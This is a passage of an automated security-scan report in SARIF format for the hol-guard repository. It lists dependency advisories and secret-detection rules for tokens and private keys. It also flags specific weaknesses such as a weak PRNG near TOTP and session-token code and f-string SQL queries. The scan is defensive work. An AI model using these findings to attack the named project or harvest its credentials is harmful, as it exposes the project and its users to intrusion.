{"id": "GO-2025-4013", "name": "stdlib: GO-2025-4013", "shortDescription": {"text": "stdlib: GO-2025-4013"}, "fullDescription": {"text": "Panic when validating certificates with DSA public keys in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4012", "name": "stdlib: GO-2025-4012", "shortDescription": {"text": "stdlib: GO-2025-4012"}, "fullDescription": {"text": "Lack of limit when parsing cookies can cause memory exhaustion in net/http"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4011", "name": "stdlib: GO-2025-4011", "shortDescription": {"text": "stdlib: GO-2025-4011"}, "fullDescription": {"text": "Parsing DER payload can cause memory exhaustion in encoding/asn1"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4010", "name": "stdlib: GO-2025-4010", "shortDescription": {"text": "stdlib: GO-2025-4010"}, "fullDescription": {"text": "Insufficient validation of bracketed IPv6 hostnames in net/url"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4009", "name": "stdlib: GO-2025-4009", "shortDescription": {"text": "stdlib: GO-2025-4009"}, "fullDescription": {"text": "Quadratic complexity when parsing some invalid inputs in encoding/pem"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4008", "name": "stdlib: GO-2025-4008", "shortDescription": {"text": "stdlib: GO-2025-4008"}, "fullDescription": {"text": "ALPN negotiation error contains attacker controlled information in crypto/tls"}, "properties": {"scanner": "osv-scanner", "category": "dependency", 
"severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4007", "name": "stdlib: GO-2025-4007", "shortDescription": {"text": "stdlib: GO-2025-4007"}, "fullDescription": {"text": "Quadratic complexity when checking name constraints in crypto/x509"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GO-2025-4006", "name": "stdlib: GO-2025-4006", "shortDescription": {"text": "stdlib: GO-2025-4006"}, "fullDescription": {"text": "Excessive CPU consumption in ParseAddress in net/mail"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "GHSA-gv7v-rgg6-548h", "name": "laravel/framework: GHSA-gv7v-rgg6-548h", "shortDescription": {"text": "laravel/framework: GHSA-gv7v-rgg6-548h"}, "fullDescription": {"text": "Laravel environment manipulation via query string"}, "properties": {"scanner": "osv-scanner", "category": "dependency", "severity": "high", "confidence": 0.88, "cwe": "", "owasp": ""}}, {"id": "MINED009", "name": "[MINED009] Floats For Money: Variable named price/amount/cost typed as float instead of Decimal.", "shortDescription": {"text": "[MINED009] Floats For Money: Variable named price/amount/cost typed as float instead of Decimal."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-682 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC128", "name": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake): Async call invoked without `await` returns", "shortDescription": {"text": "[SEC128] Async function without await \u2014 fire-and-forget Promise (AI mistake): Async call invoked without `await` returns an unhandled Promise. 
The outer function resolves before the inner work completes \u2014 DB writes lost, emails not sent, ra"}, "fullDescription": {"text": "Add `await` before each async call, or chain with `.then`. If you intentionally want fire-and-forget, prefix with `void` (TS) or assign to `_` (Python with `asyncio.create_task`) to make the intent explicit and survive lint."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED006", "name": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working.", "shortDescription": {"text": "[MINED006] Overcatch Baseexception: except BaseException: ... \u2014 prevents Ctrl+C and SystemExit from working."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-705 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED004", "name": "[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums).", "shortDescription": {"text": "[MINED004] Weak Crypto: MD5/SHA1/DES/RC4 used for security context (not just checksums)."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-327 / A02:2021 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC078", "name": "[SEC078] Python: requests without timeout: requests.get/post without a timeout will hang indefinitely on a non-responsiv", "shortDescription": {"text": "[SEC078] Python: requests without timeout: requests.get/post without a timeout will hang indefinitely on a non-responsive server, causing thread exhaustion and denial of service. Ported from bandit B113 (Apache-2.0). 
NOTE: this regex is heuristic; a re"}, "fullDescription": {"text": "Add `timeout=10` (or appropriate value) to every requests call."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "SEC085", "name": "[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. ", "shortDescription": {"text": "[SEC085] JS: child_process.exec with non-literal: child_process.exec with user-derived input enables command injection. Ported from eslint-plugin-security detect-child-process (Apache-2.0)."}, "fullDescription": {"text": "Use execFile / spawn with separate args array; never pass shell strings."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED118", "name": "Dockerfile FROM `codex_plugin_scanner.cli (no tag)` not pinned by digest", "shortDescription": {"text": "Dockerfile FROM `codex_plugin_scanner.cli (no tag)` not pinned by digest"}, "fullDescription": {"text": "`FROM codex_plugin_scanner.cli (no tag)` resolves the tag at build time. The registry CAN re-push a different image for the same tag, so every build is potentially different. Production images should pin to `image@sha256:...` for reproducibility + supply-chain integrity."}, "properties": {"scanner": "repobility-supply-chain", "category": "dependency", "severity": "high", "confidence": 0.9, "cwe": "", "owasp": ""}}, {"id": "MINED106", "name": "Phantom test coverage: test_future_generated_at_fails", "shortDescription": {"text": "Phantom test coverage: test_future_generated_at_fails"}, "fullDescription": {"text": "Test function `test_future_generated_at_fails` runs code but contains no assert / expect / should call \u2014 it passes regardless of behaviour. 
Adds line coverage without verifying anything."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED108", "name": "`self.send_header` used but never assigned in __init__", "shortDescription": {"text": "`self.send_header` used but never assigned in __init__"}, "fullDescription": {"text": "Method `do_POST` of class `_RejectedEventHandler` reads `self.send_header`, but no assignment to it exists in __init__ (and no class-level fallback). This raises AttributeError the first time the method runs against an instance."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "high", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "github-pat", "name": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content ex", "shortDescription": {"text": "Uncovered a GitHub Personal Access Token, potentially leading to unauthorized repository access and sensitive content exposure."}, "fullDescription": {"text": "Gitleaks detected a committed secret or credential pattern."}, "properties": {"scanner": "gitleaks", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "private-key", "name": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption.", "shortDescription": {"text": "Identified a Private Key, which may compromise cryptographic security and sensitive data encryption."}, "fullDescription": {"text": "Gitleaks detected a committed secret or credential pattern."}, "properties": {"scanner": "gitleaks", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "curl-auth-user", "name": "Discovered a potential basic authorization token provided in a curl command, which could compromise the curl accessed re", "shortDescription": {"text": 
"Discovered a potential basic authorization token provided in a curl command, which could compromise the curl accessed resource."}, "fullDescription": {"text": "Gitleaks detected a committed secret or credential pattern."}, "properties": {"scanner": "gitleaks", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "generic-api-key", "name": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations.", "shortDescription": {"text": "Detected a Generic API Key, potentially exposing access to various services and sensitive operations."}, "fullDescription": {"text": "Gitleaks detected a committed secret or credential pattern."}, "properties": {"scanner": "gitleaks", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "curl-auth-header", "name": "Discovered a potential authorization token provided in a curl command header, which could compromise the curl accessed r", "shortDescription": {"text": "Discovered a potential authorization token provided in a curl command header, which could compromise the curl accessed resource."}, "fullDescription": {"text": "Gitleaks detected a committed secret or credential pattern."}, "properties": {"scanner": "gitleaks", "category": "credential_exposure", "severity": "critical", "confidence": 0.95, "cwe": "", "owasp": ""}}, {"id": "MINED007", "name": "[MINED007] Sql String Concat: cursor.execute(f\"... {user_input} ...\") \u2014 SQL injection.", "shortDescription": {"text": "[MINED007] Sql String Concat: cursor.execute(f\"... {user_input} ...\") \u2014 SQL injection."}, "fullDescription": {"text": "Review and fix per the pattern semantics. 
See CWE-89 / A03:2021 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "critical", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED024", "name": "[MINED024] Js Eval Usage: eval() executes arbitrary code. Code injection risk.", "shortDescription": {"text": "[MINED024] Js Eval Usage: eval() executes arbitrary code. Code injection risk."}, "fullDescription": {"text": "Review and fix per the pattern semantics. See CWE-95 for context."}, "properties": {"scanner": "repobility-threat-engine", "category": "quality", "severity": "critical", "confidence": 1.0, "cwe": "", "owasp": ""}}, {"id": "MINED107", "name": "Missing import: `signal` used but not imported", "shortDescription": {"text": "Missing import: `signal` used but not imported"}, "fullDescription": {"text": "The file uses `signal.something(...)` but never imports `signal`. This raises NameError at runtime the first time the line executes."}, "properties": {"scanner": "repobility-ast-engine", "category": "quality", "severity": "critical", "confidence": 1.0, "cwe": "", "owasp": ""}}]}}, "automationDetails": {"id": "repobility/1411"}, "properties": {"repository": "hashgraph-online/hol-guard", "repoUrl": "https://github.com/hashgraph-online/hol-guard", "branch": "main"}, "results": [{"ruleId": "JRN002", "level": "warning", "message": {"text": "Browser storage is used for session token material"}, "properties": {"repobilityId": 145129, "scanner": "repobility-journey-contract", "fingerprint": "741b8241bf92cf2776bdb88f4a2cbc8ad7f05edf17920c396fff9978605aef44", "category": "auth", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Storage API call references token-like key or value names.", "evidence": {"rule_id": "JRN002", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": 
"code|auth|dashboard/src/guard-api.ts|177|jrn002"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/guard-api.ts"}, "region": {"startLine": 177}}}]}, {"ruleId": "JRN002", "level": "warning", "message": {"text": "Browser storage is used for session token material"}, "properties": {"repobilityId": 145128, "scanner": "repobility-journey-contract", "fingerprint": "a01a7796ae40a895bc69a4c75fa30c211d81d7e779f472748f6fdc5480f30456", "category": "auth", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Storage API call references token-like key or value names.", "evidence": {"rule_id": "JRN002", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": "code|auth|dashboard/src/guard-api.ts|172|jrn002"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/guard-api.ts"}, "region": {"startLine": 172}}}]}, {"ruleId": "JRN002", "level": "warning", "message": {"text": "Browser storage is used for session token material"}, "properties": {"repobilityId": 145127, "scanner": "repobility-journey-contract", "fingerprint": "cf90bf983ac897e97c84a737a74a6b6cab7bf1526e3c956a9e954f8480c53b4b", "category": "auth", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Storage API call references token-like key or value names.", "evidence": {"rule_id": "JRN002", "scanner": "repobility-journey-contract", "references": ["https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html"], "correlation_key": "code|auth|dashboard/src/guard-api.ts|169|jrn002"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "dashboard/src/guard-api.ts"}, "region": {"startLine": 169}}}]}, {"ruleId": "GHSA-65pc-fj4g-8rjx", "level": "warning", "message": {"text": "idna: 
GHSA-65pc-fj4g-8rjx"}, "properties": {"repobilityId": 145121, "scanner": "osv-scanner", "fingerprint": "3cb0e6e51097792f0802522bd5a1c534f3c96b9d90576d70a538075f8c4d5bb0", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-45409"], "package": "idna", "rule_id": "GHSA-65pc-fj4g-8rjx", "scanner": "osv-scanner", "correlation_key": "vuln|idna|CVE-2024-3651|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-jg22-mg44-37j8", "level": "warning", "message": {"text": "aiohttp: GHSA-jg22-mg44-37j8"}, "properties": {"repobilityId": 145120, "scanner": "osv-scanner", "fingerprint": "f360dcc0eba31763fb048fbf952ff9aaacd93fae36b950018274d5457fa1322d", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-34993"], "package": "aiohttp", "rule_id": "GHSA-jg22-mg44-37j8", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-34993|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-hg6j-4rv6-33pg", "level": "warning", "message": {"text": "aiohttp: GHSA-hg6j-4rv6-33pg"}, "properties": {"repobilityId": 145119, "scanner": "osv-scanner", "fingerprint": "2da1f8cf81a5e62587e98e266536e6b0ec96ebc178f00a59702cebb0a7957e28", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-47265"], "package": "aiohttp", "rule_id": "GHSA-hg6j-4rv6-33pg", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-47265|uv.lock"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "uv.lock"}, "region": 
{"startLine": 1}}}]}, {"ruleId": "GHSA-83wp-f5c3-hqqr", "level": "warning", "message": {"text": "laravel/framework: GHSA-83wp-f5c3-hqqr"}, "properties": {"repobilityId": 145081, "scanner": "osv-scanner", "fingerprint": "248705eabde50cbabf9eb48902f907938c49604d9d7f1f91dd50dd342126ef89", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2024-13919"], "package": "laravel/framework", "rule_id": "GHSA-83wp-f5c3-hqqr", "scanner": "osv-scanner", "correlation_key": "vuln|laravel/framework|CVE-2024-13919|token"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/composer-safe/composer.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-78fx-h6xr-vch4", "level": "warning", "message": {"text": "laravel/framework: GHSA-78fx-h6xr-vch4"}, "properties": {"repobilityId": 145080, "scanner": "osv-scanner", "fingerprint": "82a801d2dd2079c9971da48f7651319a793c056890aa3f3029c4f458a07bfa76", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "Collapsed 1 duplicate scanner signal(s) for the same underlying issue.", "evidence": {"match": "", "aliases": ["BIT-laravel-2025-27515", "CVE-2025-27515"], "package": "laravel/framework", "rule_id": "GHSA-78fx-h6xr-vch4", "scanner": "osv-scanner", "correlation_key": "vuln|laravel/framework|CVE-2025-27515|token", "duplicate_count": 1, "duplicate_rule_ids": ["GHSA-78fx-h6xr-vch4"], "duplicate_scanners": ["osv-scanner"], "duplicate_fingerprints": ["82a801d2dd2079c9971da48f7651319a793c056890aa3f3029c4f458a07bfa76", "89dba378cfc4088bb86bf11271d3422d5d652708bd596fa2b43b6bbcf2919fd6"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/composer-safe/composer.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-546h-56qp-8jmw", "level": "warning", "message": 
{"text": "laravel/framework: GHSA-546h-56qp-8jmw"}, "properties": {"repobilityId": 145079, "scanner": "osv-scanner", "fingerprint": "9ab215086e06d18c106026d6d7cfabfcdf789713e5c2e0f9a6c5fe85b47c5adb", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2024-13918"], "package": "laravel/framework", "rule_id": "GHSA-546h-56qp-8jmw", "scanner": "osv-scanner", "correlation_key": "vuln|laravel/framework|CVE-2024-13918|token"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "tests/fixtures/tier2/composer-safe/composer.lock"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-65pc-fj4g-8rjx", "level": "warning", "message": {"text": "idna: GHSA-65pc-fj4g-8rjx"}, "properties": {"repobilityId": 145073, "scanner": "osv-scanner", "fingerprint": "096ad1adcda9b23f165f1175fd8691f1cfd4f580557aea52903b73ec76fbc472", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-45409"], "package": "idna", "rule_id": "GHSA-65pc-fj4g-8rjx", "scanner": "osv-scanner", "correlation_key": "vuln|idna|CVE-2024-3651|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-jg22-mg44-37j8", "level": "warning", "message": {"text": "aiohttp: GHSA-jg22-mg44-37j8"}, "properties": {"repobilityId": 145072, "scanner": "osv-scanner", "fingerprint": "bb971f373dd7f2acff955adba1f92b12c942492a97f08458a8dadaa7c18e93e6", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-34993"], "package": "aiohttp", "rule_id": "GHSA-jg22-mg44-37j8", "scanner": "osv-scanner", "correlation_key": 
"vuln|aiohttp|CVE-2026-34993|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-hg6j-4rv6-33pg", "level": "warning", "message": {"text": "aiohttp: GHSA-hg6j-4rv6-33pg"}, "properties": {"repobilityId": 145071, "scanner": "osv-scanner", "fingerprint": "24ce5e6eaf33a3edf2b03cfe1c286736bc081473f99e56bf36436aa03b363f3d", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-47265"], "package": "aiohttp", "rule_id": "GHSA-hg6j-4rv6-33pg", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-47265|requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-65pc-fj4g-8rjx", "level": "warning", "message": {"text": "idna: GHSA-65pc-fj4g-8rjx"}, "properties": {"repobilityId": 145065, "scanner": "osv-scanner", "fingerprint": "b6db551b325a6de8c429bd6afe8f65bd31671fcbeaba6ba5c7b25de07a588e84", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-45409"], "package": "idna", "rule_id": "GHSA-65pc-fj4g-8rjx", "scanner": "osv-scanner", "correlation_key": "vuln|idna|CVE-2024-3651|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-jg22-mg44-37j8", "level": "warning", "message": {"text": "aiohttp: GHSA-jg22-mg44-37j8"}, "properties": {"repobilityId": 145064, "scanner": "osv-scanner", "fingerprint": "84514b809d7cb26363042eaba8cc3f8e0b9cb2af3cc7cb8a0c9347617ef729fb", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, 
"reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-34993"], "package": "aiohttp", "rule_id": "GHSA-jg22-mg44-37j8", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-34993|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "GHSA-hg6j-4rv6-33pg", "level": "warning", "message": {"text": "aiohttp: GHSA-hg6j-4rv6-33pg"}, "properties": {"repobilityId": 145063, "scanner": "osv-scanner", "fingerprint": "16f1c4adb7231182ee02968348577e11190247968bf8d548b699e86fe1ba0a9a", "category": "dependency", "severity": "medium", "confidence": 0.88, "triageState": "open", "verdict": "", "isResolved": false, "reason": "", "evidence": {"match": "", "aliases": ["CVE-2026-47265"], "package": "aiohttp", "rule_id": "GHSA-hg6j-4rv6-33pg", "scanner": "osv-scanner", "correlation_key": "vuln|aiohttp|CVE-2026-47265|docker-requirements.txt"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "docker-requirements.txt"}, "region": {"startLine": 1}}}]}, {"ruleId": "DKR002", "level": "warning", "message": {"text": "Dockerfile base image has no explicit tag"}, "properties": {"repobilityId": 145035, "scanner": "repobility-docker", "fingerprint": "4c131747a64a9f2082a10016e32d2edb905e42662ab52f20107a1dbabe65e5a5", "category": "docker", "severity": "medium", "confidence": 0.9, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Image reference has no tag or digest.", "evidence": {"image": "codex_plugin_scanner.cli", "rule_id": "DKR002", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://docs.docker.com/scout/policy/", "https://github.com/hadolint/hadolint"], "correlation_key": "fp|4c131747a64a9f2082a10016e32d2edb905e42662ab52f20107a1dbabe65e5a5"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "Dockerfile"}, "region": 
{"startLine": 36}}}]}, {"ruleId": "DKR002", "level": "warning", "message": {"text": "Dockerfile base image has no explicit tag"}, "properties": {"repobilityId": 145034, "scanner": "repobility-docker", "fingerprint": "60ae264d80b41cdb3638e40256510f2728aa7fd778781e3f15ba6c648dafc4a1", "category": "docker", "severity": "medium", "confidence": 0.9, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Image reference has no tag or digest.", "evidence": {"image": "__future__", "rule_id": "DKR002", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://docs.docker.com/scout/policy/", "https://github.com/hadolint/hadolint"], "correlation_key": "fp|60ae264d80b41cdb3638e40256510f2728aa7fd778781e3f15ba6c648dafc4a1"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "Dockerfile"}, "region": {"startLine": 17}}}]}, {"ruleId": "DKR001", "level": "warning", "message": {"text": "Docker final stage has no non-root USER"}, "properties": {"repobilityId": 145031, "scanner": "repobility-docker", "fingerprint": "9f09597e0dda606b6105e1f1cc7e41f8d4b5e85b5e03c94162198cc2794304fa", "category": "docker", "severity": "medium", "confidence": 0.82, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "No USER directive was found in the final runtime stage.", "evidence": {"rule_id": "DKR001", "scanner": "repobility-docker", "final_base": "gcr.io/oss-fuzz-base/base-builder-python@sha256:721650302bfda2f3832df73bb24aeacfa41c32e692f3d6e4dd06074e79c64ed7", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html", "https://github.com/hadolint/hadolint"], "correlation_key": "fp|9f09597e0dda606b6105e1f1cc7e41f8d4b5e85b5e03c94162198cc2794304fa"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".clusterfuzzlite/Dockerfile"}, "region": 
{"startLine": 1}}}]}, {"ruleId": "DKR014", "level": "warning", "message": {"text": "Dockerfile copies broad context with incomplete .dockerignore"}, "properties": {"repobilityId": 145030, "scanner": "repobility-docker", "fingerprint": "84ccd41d41077e6d8c173d7fe793b2920745039cd8f9f316f45300d7543d5edc", "category": "docker", "severity": "medium", "confidence": 0.76, "triageState": "open", "verdict": "likely", "isResolved": false, "reason": "Broad context copy found and .dockerignore misses sensitive defaults.", "evidence": {"rule_id": "DKR014", "scanner": "repobility-docker", "references": ["https://docs.docker.com/develop/develop-images/dockerfile_best-practices/"], "correlation_key": "fp|84ccd41d41077e6d8c173d7fe793b2920745039cd8f9f316f45300d7543d5edc", "missing_patterns": [".env", "id_rsa", "*.pem", "*.key"]}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": ".clusterfuzzlite/Dockerfile"}, "region": {"startLine": 7}}}]}, {"ruleId": "SEC119", "level": "warning", "message": {"text": "[SEC119] World-writable / world-readable file permissions: World-writable files let any local user (or container neighbor) tamper with data; world-readable files leak secrets."}, "properties": {"repobilityId": 145025, "scanner": "repobility-threat-engine", "fingerprint": "ef7f50c0ea92fc4cc0a22750b805bce4f34a93f7b9062bcf30c42b61ab10e20c", "category": "security", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "os.chmod(self.base_dir, 0o700)", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC119", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|security|token|35|sec119"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/totp.py"}, "region": {"startLine": 35}}}]}, {"ruleId": "SEC042", "level": "warning", "message": 
{"text": "[SEC042] SQL identifier injection via f-string in cursor execute: f-string SQL normalizes an unsafe pattern. Currently safe when only trusted internal values are interpolated (e.g. self._table in Odoo), but a future contributor can extend the f-string to user input without noticing. CWE-89. Identifiers (table/column names) need a separate escaping path from values."}, "properties": {"repobilityId": 145024, "scanner": "repobility-threat-engine", "fingerprint": "b733b9bfa76d215329ef98dcfdb1a327a1ffe33879732a0d51668f4d68f61765", "category": "injection", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Pattern matched with no mitigating context found", "evidence": {"match": "connection.execute(\n        f\"", "reason": "Pattern matched with no mitigating context found", "rule_id": "SEC042", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|injection|token|159|sec042"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/store_resume.py"}, "region": {"startLine": 159}}}]}, {"ruleId": "SEC015", "level": "warning", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. 
Output is predictable."}, "properties": {"repobilityId": 145018, "scanner": "repobility-threat-engine", "fingerprint": "a050f910600b210ad85b66ff06da72d52f0580de637290c1eee9f95699fb574c", "category": "crypto", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "evidence": {"match": "def generate_totp_secret", "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|crypto|token|95|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/totp.py"}, "region": {"startLine": 95}}}]}, {"ruleId": "SEC015", "level": "warning", "message": {"text": "[SEC015] Insecure Randomness for Security: Weak PRNG used in security-sensitive context. Output is predictable."}, "properties": {"repobilityId": 145017, "scanner": "repobility-threat-engine", "fingerprint": "6384cf219c7d60da7e43869f72ca4bd3a5da40dd78fbb43c46b6c3340299628e", "category": "crypto", "severity": "medium", "confidence": 1.0, "triageState": "open", "verdict": "confirmed", "isResolved": false, "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "evidence": {"match": "def build_local_dashboard_session_token", "reason": "Security-sensitive keyword found nearby \u2014 weak PRNG is risky here", "rule_id": "SEC015", "scanner": "repobility-threat-engine", "confidence": 1.0, "correlation_key": "code|crypto|token|18|sec015"}}, "locations": [{"physicalLocation": {"artifactLocation": {"uri": "src/codex_plugin_scanner/guard/local_dashboard_session.py"}, "region": {"startLine": 18}}}]}, {"ruleId": "SEC136", "level": "warning", "message": {"text": "[SEC136] AI-typical over-broad exception handler swallowing all errors: Catch-all exception block that silently returns success or no-ops. 
